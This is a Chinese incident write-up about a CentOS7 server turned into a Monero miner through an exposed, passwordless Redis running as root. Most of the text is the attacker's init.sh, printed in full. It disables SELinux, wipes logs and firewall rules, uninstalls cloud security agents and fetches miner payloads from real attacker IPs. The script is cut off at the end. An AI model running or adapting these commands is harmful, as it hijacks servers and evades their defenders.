日韩av黄I国产麻豆传媒I国产91av视频在线观看I日韩一区二区三区在线看I美女国产在线I麻豆视频国产在线观看I成人黄色短片

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 运维知识 > 数据库 >内容正文

数据库

记一次CentOS7因Redis配置不当导致被Root提权沦为矿机修复过程

發布時間:2024/1/1 数据库 32 豆豆
生活随笔 收集整理的這篇文章主要介紹了 记一次CentOS7因Redis配置不当导致被Root提权沦为矿机修复过程 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

未曾想過,那些年影視劇中黑客們的精彩橋段,竟在2020這個充滿魔幻的年份,變成了現實。

前幾日傍晚突然收到了來自阿里云安全中心的提醒,服務器疑似受到攻擊了。想不到我那用作學習的機器,有朝一日竟然淪為礦機。剛買完晚餐的我,突然就覺得手里的吃的不香了。打開手機試著訪問自己的項目網站 ,果然,連接不上了。根據云安全的提示,對可疑的進程使用kill命令直接結束。但阿里云平臺仍然不斷提醒我警報未消除,嘗試去查 “載荷投遞” 卻一無所獲。服務器也一度因為端口惡意掃描而被多次阻斷,看著一個個警告信息但卻束手無策,便不由得想放棄。而一想到自己的相關的數據文件全在服務器上,又繼續探尋下去,兜兜轉轉查看好多資料后才逐漸了解到,服務器中了挖礦病毒。攻擊者通過Redis服務配置不當的漏洞,入侵服務器后放置腳本,其目的是利用服務器資源來挖礦,并且腳本自帶端口掃描會對周圍服務器進行檢測,繼續尋找新的宿主機嘗試入侵(因為腳本不斷惡意掃描端口,被阿里云安全平臺阻斷端口訪問),進而獲取更多的礦機,而開采門羅幣則是需要很多的服務器資源,因此也不足為奇了。

攻擊原理

由于服務器Redis服務監聽了公網端口未設置訪問密碼并且其進程啟動時使用了root用戶,攻擊者可遠程登錄到Redis中,通過Redis內置的命令將自己的公鑰寫入到/root/.ssh/authorized_keys文件夾下,進而可以直接免密登錄到服務器上,并在服務器中植入惡意腳本,實現利用服務器挖礦操作。

腳本分析

通過攻擊者服務器獲取的腳本init.sh文件如下

#!/bin/sh setenforce 0 2>dev/null echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null sync && echo 3 >/proc/sys/vm/drop_caches crondir='/var/spool/cron/'"$USER" cont=`cat ${crondir}` ssht=`cat /root/.ssh/authorized_keys` echo 1 > /etc/zzhs rtdir="/etc/zzhs" bbdir="/usr/bin/curl" bbdira="/usr/bin/cd1" ccdir="/usr/bin/wget" ccdira="/usr/bin/wd1" mv /usr/bin/curl /usr/bin/url mv /usr/bin/url /usr/bin/cd1 mv /usr/bin/wget /usr/bin/get mv /usr/bin/get /usr/bin/wd1 ulimit -n 65535 rm -rf /var/log/syslog chattr -iua /tmp/ chattr -iua /var/tmp/ ufw disable iptables -F #sudo sysctl kernel.nmi_watchdog=0 echo '0' >/proc/sys/kernel/nmi_watchdog echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf userdel akay userdel vfinder rm -rf /tmp/addres* rm -rf /tmp/walle* rm -rf /tmp/keys if ps aux | grep -i '[a]liyun'; then$bbdir http://update.aegis.aliyun.com/download/uninstall.sh | bash$bbdir http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash$bbdira http://update.aegis.aliyun.com/download/uninstall.sh | bash$bbdira http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bashpkill aliyun-servicerm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-servicerm -rf /usr/local/aegis*systemctl stop aliyun.servicesystemctl disable aliyun.serviceservice bcm-agent stopyum remove bcm-agent -yapt-get remove bcm-agent -y elif ps aux | grep -i '[y]unjing'; then/usr/local/qcloud/stargate/admin/uninstall.sh/usr/local/qcloud/YunJing/uninst.sh/usr/local/qcloud/monitor/barad/admin/uninstall.sh fiminer_url="http://39.100.33.209/b2f628/zzh" miner_url_backup="http://47.253.42.213/b2f628/zzh" miner_size="7600464" sh_url="http://39.100.33.209/b2f628/newinit.sh" sh_url_backup="http://47.253.42.213/b2f628/newinit.sh" config_url="http://39.100.33.209/b2f628/config.json" config_url_backup="http://47.253.42.213/b2f628/config.json" config_size="2732" chattr_size="8000" #scan_url="http://103.125.218.107/b2f628/svcworkmanager" #scan_url_backup="http://45.9.148.37/b2f628fff19fda999999999/svcworkmanager" #scan_size="1919056" #watchdog_url="http://103.125.218.107/b2f628/svcguard" #watchdog_url_backup="http://45.9.148.37/b2f628fff19fda999999999/svcguard" #watchdog_size="1472136" #$bbdira -fsSL http://103.125.218.107/b2f628/iplog.php 2>/dev/null #$bbdir -fsSL http://45.9.148.37/b2f628fff19fda999999999/iplog.php 2>/dev/null #$ccdira http://103.125.218.107/b2f628/iplog.php -O /tmp/.null 2>/dev/null #$ccdir http://45.9.148.37/b2f628fff19fda999999999/iplog.php -O /tmp/.null 2>/dev/null rm -f /tmp/.null 2>/dev/nullecho 128 > /proc/sys/vm/nr_hugepages sysctl -w vm.nr_hugepages=128kill_miner_proc() { netstat -anp | grep 185.71.65.238 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs -I % kill -9 % netstat -anp | grep 140.82.52.87 | awk '{print $7}' | awk -F'[/]' '{print $1}' | xargs -I % kill -9 % netstat -anp | grep :443 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % netstat -anp | grep :23 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % netstat -anp | grep :443 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % netstat -anp | grep :143 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % netstat -anp | grep :2222 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % netstat -anp | grep :3333 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % netstat -anp | grep :3389 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % netstat -anp | grep :5555 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % netstat -anp | grep :6666 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % netstat -anp | grep :6665 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % netstat -anp | grep :6667 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % netstat -anp | grep :7777 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % netstat -anp | grep :8444 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % netstat -anp | grep :3347 | awk '{print $7}' | awk -F'[/]' '{print $1}' | grep -v "-" | xargs -I % kill -9 % ps aux | grep -v grep | grep ':3333' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep ':5555' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'kworker -c\' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'log_' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'systemten' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'netns' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'voltuned' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'darwin' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/dl' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/ddg' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/pprt' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/ppol' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/65ccE*' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/jmx*' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/2Ne80*' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'IOFoqIgyC0zmf2UR' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '45.76.122.92' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '51.38.191.178' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '51.15.56.161' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '86s.jpg' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'aGTSGJJp' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'nMrfmnRa' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'PuNY5tm2' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'I0r8Jyyt' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'AgdgACUD' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'uiZvwxG8' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'hahwNEdB' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'BtwXn5qH' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '3XEzey2T' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 't2tKrCSZ' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'svc' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'HD7fcBgg' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'zXcDajSs' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '3lmigMo' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'AkMK4A2' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'AJ2AkKe' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'HiPxCJRS' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'http_0xCC030' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'http_0xCC031' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'http_0xCC032' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'http_0xCC033' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "C4iLM4L" | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'aziplcr72qjhzvin' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | awk '{ if(substr($11,1,2)=="./" && substr($12,1,2)=="./") print $2 }' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/boot/vmlinuz' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "i4b503a52cc5" | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "dgqtrcst23rtdi3ldqk322j2" | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "2g0uv7npuhrlatd" | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "nqscheduler" | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "rkebbwgqpl4npmm" | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep -v aux | grep "]" | awk '$3>10.0{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "2fhtu70teuhtoh78jc5s" | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "0kwti6ut420t" | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "44ct7udt0patws3agkdfqnjm" | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep -v "/" | grep -v "-" | grep -v "_" | awk 'length($11)>19{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "\[^" | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "rsync" | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "watchd0g" | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | egrep 'wnTKYg|2t3ik|qW3xT.2|ddg' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "158.69.133.18:8220" | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "/tmp/java" | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'gitee.com' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/java' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '104.248.4.162' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '89.35.39.78' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/dev/shm/z3.sh' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'kthrotlds' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'ksoftirqds' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'netdns' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'watchdogs' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'kdevtmpfsi' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'kinsing' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'redis2' | awk '{print $2}' | xargs -I % kill -9 % #ps aux | grep -v grep | grep -v root | grep -v dblaunch | grep -v dblaunchs | grep -v dblaunched | grep -v apache2 | grep -v atd | grep -v kdevtmpfsi | awk '$3>80.0{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep -v aux | grep " ps" | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep "sync_supers" | cut -c 9-15 | xargs -I % kill -9 % ps aux | grep -v grep | grep "cpuset" | cut -c 9-15 | xargs -I % kill -9 % ps aux | grep -v grep | grep -v aux | grep "x]" | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep -v aux | grep "sh] <" | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep -v aux | grep " \[]" | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/l.sh' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/zmcat' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'hahwNEdB' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'CnzFVPLF' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'CvKzzZLs' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'aziplcr72qjhzvin' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '/tmp/udevd' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'sustse' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'sustse3' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'mr.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'mr.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '2mr.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '2mr.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'cr5.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'cr5.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'logo9.jpg' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'logo9.jpg' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'j2.conf' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'luk-cpu' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'luk-cpu' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'ficov' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'ficov' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'he.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'he.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'miner.sh' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'miner.sh' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'nullcrew' | grep 'wget' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep 'nullcrew' | grep 'curl' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '107.174.47.156' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '83.220.169.247' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '51.38.203.146' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '144.217.45.45' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '107.174.47.181' | awk '{print $2}' | xargs -I % kill -9 % ps aux | grep -v grep | grep '176.31.6.16' | awk '{print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "mine.moneropool.com" | awk '{print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "pool.t00ls.ru" | awk '{print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:8080" | awk '{print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:3333" | awk '{print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "zhuabcn@yahoo.com" | awk '{print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "monerohash.com" | awk '{print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "/tmp/a7b104c270" | awk '{print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:6666" | awk '{print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:7777" | awk '{print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "xmr.crypto-pool.fr:443" | awk '{print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "stratum.f2pool.com:8888" | awk '{print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "xmrpool.eu" | awk '{print $2}' | xargs -I % kill -9 % ps auxf | grep -v grep | grep "kieuanilam.me" | awk '{print $2}' | xargs -I % kill -9 % ps auxf | grep xiaoyao | awk '{print $2}' | xargs -I % kill -9 % ps auxf | grep xiaoxue | awk '{print $2}' | xargs -I % kill -9 % netstat -antp | grep '46.243.253.15' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 % netstat -antp | grep '176.31.6.16' | grep 'ESTABLISHED\|SYN_SENT' | awk '{print $7}' | sed -e "s/\/.*//g" | xargs -I % kill -9 % pgrep -f L2Jpbi9iYXN | xargs -I % kill -9 % pgrep -f xzpauectgr | xargs -I % kill -9 % pgrep -f slxfbkmxtd | xargs -I % kill -9 % pgrep -f mixtape | xargs -I % kill -9 % pgrep -f addnj | xargs -I % kill -9 % pgrep -f 200.68.17.196 | xargs -I % kill -9 % pgrep -f IyEvYmluL3NoCgpzUG | xargs -I % kill -9 % pgrep -f KHdnZXQgLXFPLSBodHRw | xargs -I % kill -9 % pgrep -f FEQ3eSp8omko5nx9e97hQ39NS3NMo6rxVQS3 | xargs -I % kill -9 % pgrep -f Y3VybCAxOTEuMTAxLjE4MC43Ni9saW4udHh0IHxzaAo | xargs -I % kill -9 % pgrep -f mwyumwdbpq.conf | xargs -I % kill -9 % pgrep -f honvbsasbf.conf | xargs -I % kill -9 % pgrep -f mqdsflm.cf | xargs -I % kill -9 % pgrep -f lower.sh | xargs -I % kill -9 % pgrep -f ./ppp | xargs -I % kill -9 % pgrep -f cryptonight | xargs -I % kill -9 % pgrep -f ./seervceaess | xargs -I % kill -9 % pgrep -f ./servceaess | xargs -I % kill -9 % pgrep -f ./servceas | xargs -I % kill -9 % pgrep -f ./servcesa | xargs -I % kill -9 % pgrep -f ./vsp | xargs -I % kill -9 % pgrep -f ./jvs | xargs -I % kill -9 % pgrep -f ./pvv | xargs -I % kill -9 % pgrep -f ./vpp | xargs -I % kill -9 % pgrep -f ./pces | xargs -I % kill -9 % pgrep -f ./rspce | xargs -I % kill -9 % pgrep -f ./haveged | xargs -I % kill -9 % pgrep -f ./jiba | xargs -I % kill -9 % pgrep -f ./watchbog | xargs -I % kill -9 % pgrep -f ./A7mA5gb | xargs -I % kill -9 % pgrep -f kacpi_svc | xargs -I % kill -9 % pgrep -f kswap_svc | xargs -I % kill -9 % pgrep -f kauditd_svc | xargs -I % kill -9 % pgrep -f kpsmoused_svc | xargs -I % kill -9 % pgrep -f kseriod_svc | xargs -I % kill -9 % pgrep -f kthreadd_svc | xargs -I % kill -9 % pgrep -f ksoftirqd_svc | xargs -I % kill -9 % pgrep -f kintegrityd_svc | xargs -I % kill -9 % pgrep -f jawa | xargs -I % kill -9 % pgrep -f oracle.jpg | xargs -I % kill -9 % pgrep -f 45cToD1FzkjAxHRBhYKKLg5utMGEN | xargs -I % kill -9 % pgrep -f 188.209.49.54 | xargs -I % kill -9 % pgrep -f 181.214.87.241 | xargs -I % kill -9 % pgrep -f etnkFgkKMumdqhrqxZ6729U7bY8pzRjYzGbXa5sDQ | xargs -I % kill -9 % pgrep -f 47TdedDgSXjZtJguKmYqha4sSrTvoPXnrYQEq2Lbj | xargs -I % kill -9 % pgrep -f etnkP9UjR55j9TKyiiXWiRELxTS51FjU9e1UapXyK | xargs -I % kill -9 % pgrep -f servim | xargs -I % kill -9 % pgrep -f kblockd_svc | xargs -I % kill -9 % pgrep -f native_svc | xargs -I % kill -9 % pgrep -f ynn | xargs -I % kill -9 % pgrep -f 65ccEJ7 | xargs -I % kill -9 % pgrep -f jmxx | xargs -I % kill -9 % pgrep -f 2Ne80nA | xargs -I % kill -9 % pgrep -f sysstats | xargs -I % kill -9 % pgrep -f systemxlv | xargs -I % kill -9 % pgrep -f watchbog | xargs -I % kill -9 % pgrep -f OIcJi1m | xargs -I % kill -9 % pkill -f biosetjenkins pkill -f Loopback pkill -f apaceha pkill -f cryptonight pkill -f mixnerdx pkill -f performedl pkill -f JnKihGjn pkill -f irqba2anc1 pkill -f irqba5xnc1 pkill -f irqbnc1 pkill -f ir29xc1 pkill -f conns pkill -f irqbalance pkill -f crypto-pool pkill -f XJnRj pkill -f mgwsl pkill -f pythno pkill -f jweri pkill -f lx26 pkill -f NXLAi pkill -f BI5zj pkill -f askdljlqw pkill -f minerd pkill -f minergate pkill -f Guard.sh pkill -f ysaydh pkill -f bonns pkill -f donns pkill -f kxjd pkill -f Duck.sh pkill -f bonn.sh pkill -f conn.sh pkill -f kworker34 pkill -f kw.sh pkill -f pro.sh pkill -f polkitd pkill -f acpid pkill -f icb5o pkill -f nopxi pkill -f irqbalanc1 pkill -f minerd pkill -f i586 pkill -f gddr pkill -f mstxmr pkill -f ddg.2011 pkill -f wnTKYg pkill -f deamon pkill -f disk_genius pkill -f sourplum pkill -f polkitd pkill -f nanoWatch pkill -f zigw pkill -f devtool pkill -f devtools pkill -f systemctI pkill -f watchbog pkill -f cryptonight pkill -f sustes pkill -f xmrig pkill -f xmrig-cpu pkill -f 121.42.151.137 pkill -f init12.cfg pkill -f nginxk pkill -f tmp/wc.conf pkill -f xmrig-notls pkill -f xmr-stak pkill -f suppoie pkill -f zer0day.ru pkill -f dbus-daemon--system pkill -f nullcrew pkill -f systemctI pkill -f kworkerds pkill -f init10.cfg pkill -f /wl.conf pkill -f crond64 pkill -f sustse pkill -f vmlinuz pkill -f exin pkill -f apachiii pkill -f svcworkmanager pkill -f xr pkill -f trace pkill -f svcupdate rm -rf /usr/bin/config.json rm -rf /usr/bin/exin rm -rf /tmp/wc.conf rm -rf /tmp/log_rot rm -rf /tmp/apachiii rm -rf /tmp/sustse rm -rf /tmp/php rm -rf /tmp/p2.conf rm -rf /tmp/pprt rm -rf /tmp/ppol rm -rf /tmp/javax/config.sh rm -rf /tmp/javax/sshd2 rm -rf /tmp/.profile rm -rf /tmp/1.so rm -rf /tmp/kworkerds rm -rf /tmp/kworkerds3 rm -rf /tmp/kworkerdssx rm -rf /tmp/xd.json rm -rf /tmp/syslogd rm -rf /tmp/syslogdb rm -rf /tmp/65ccEJ7 rm -rf /tmp/jmxx rm -rf /tmp/2Ne80nA rm -rf /tmp/dl rm -rf /tmp/ddg rm -rf /tmp/systemxlv rm -rf /tmp/systemctI rm -rf /tmp/.abc rm -rf /tmp/osw.hb rm -rf /tmp/.tmpleve rm -rf /tmp/.tmpnewzz rm -rf /tmp/.java rm -rf /tmp/.omed rm -rf /tmp/.tmpc rm -rf /tmp/.tmpleve rm -rf /tmp/.tmpnewzz rm -rf /tmp/gates.lod rm -rf /tmp/conf.n rm -rf /tmp/devtool rm -rf /tmp/devtools rm -rf /tmp/fs rm -rf /tmp/.rod rm -rf /tmp/.rod.tgz rm -rf /tmp/.rod.tgz.1 rm -rf /tmp/.rod.tgz.2 rm -rf /tmp/.mer rm -rf /tmp/.mer.tgz rm -rf /tmp/.mer.tgz.1 rm -rf /tmp/.hod rm -rf /tmp/.hod.tgz rm -rf /tmp/.hod.tgz.1 rm -rf /tmp/84Onmce rm -rf /tmp/C4iLM4L rm -rf /tmp/lilpip rm -rf /tmp/3lmigMo rm -rf /tmp/am8jmBP rm -rf /tmp/tmp.txt rm -rf /tmp/baby rm -rf /tmp/.lib rm -rf /tmp/systemd rm -rf /tmp/lib.tar.gz rm -rf /tmp/baby rm -rf /tmp/java rm -rf /tmp/j2.conf rm -rf /tmp/.mynews1234 rm -rf /tmp/a3e12d rm -rf /tmp/.pt rm -rf /tmp/.pt.tgz rm -rf /tmp/.pt.tgz.1 rm -rf /tmp/go rm -rf /tmp/java rm -rf /tmp/j2.conf rm -rf /tmp/.tmpnewasss rm -rf /tmp/java rm -rf /tmp/go.sh rm -rf /tmp/go2.sh rm -rf /tmp/khugepageds rm -rf /tmp/.censusqqqqqqqqq rm -rf /tmp/.kerberods rm -rf /tmp/kerberods rm -rf /tmp/seasame rm -rf /tmp/touch rm -rf /tmp/.p rm -rf /tmp/runtime2.sh rm -rf /tmp/runtime.sh rm -rf /dev/shm/z3.sh rm -rf /dev/shm/z2.sh rm -rf /dev/shm/.scr rm -rf /dev/shm/.kerberods rm -f /etc/ld.so.preload rm -f /usr/local/lib/libioset.so chattr -i /etc/ld.so.preload rm -f /etc/ld.so.preload rm -f /usr/local/lib/libioset.so rm -rf /tmp/watchdogs rm -rf /etc/cron.d/tomcat rm -rf /etc/rc.d/init.d/watchdogs rm -rf /usr/sbin/watchdogs rm -f /tmp/kthrotlds rm -f /etc/rc.d/init.d/kthrotlds rm -rf /tmp/.sysbabyuuuuu12 rm -rf /tmp/logo9.jpg rm -rf /tmp/miner.sh rm -rf /tmp/nullcrew rm -rf /tmp/proc rm -rf /tmp/2.sh rm /opt/atlassian/confluence/bin/1.sh rm /opt/atlassian/confluence/bin/1.sh.1 rm /opt/atlassian/confluence/bin/1.sh.2 rm /opt/atlassian/confluence/bin/1.sh.3 rm /opt/atlassian/confluence/bin/3.sh rm /opt/atlassian/confluence/bin/3.sh.1 rm /opt/atlassian/confluence/bin/3.sh.2 rm /opt/atlassian/confluence/bin/3.sh.3 rm -rf /var/tmp/f41 rm -rf /var/tmp/2.sh rm -rf /var/tmp/config.json rm -rf /var/tmp/xmrig rm -rf /var/tmp/1.so rm -rf /var/tmp/kworkerds3 rm -rf /var/tmp/kworkerdssx rm -rf /var/tmp/kworkerds rm -rf /var/tmp/wc.conf rm -rf /var/tmp/nadezhda. rm -rf /var/tmp/nadezhda.arm rm -rf /var/tmp/nadezhda.arm.1 rm -rf /var/tmp/nadezhda.arm.2 rm -rf /var/tmp/nadezhda.x86_64 rm -rf /var/tmp/nadezhda.x86_64.1 rm -rf /var/tmp/nadezhda.x86_64.2 rm -rf /var/tmp/sustse3 rm -rf /var/tmp/sustse rm -rf /var/tmp/moneroocean/ rm -rf /var/tmp/devtool rm -rf /var/tmp/devtools rm -rf /var/tmp/play.sh rm -rf /var/tmp/systemctI rm -rf /var/tmp/.java rm -rf /var/tmp/1.sh rm -rf /var/tmp/conf.n rm -r /var/tmp/lib rm -r /var/tmp/.lib chattr -iau /tmp/lok chmod +700 /tmp/lok rm -rf /tmp/lok sleep 1 chattr -i /tmp/kdevtmpfsi echo 1 > /tmp/kdevtmpfsi chattr +i 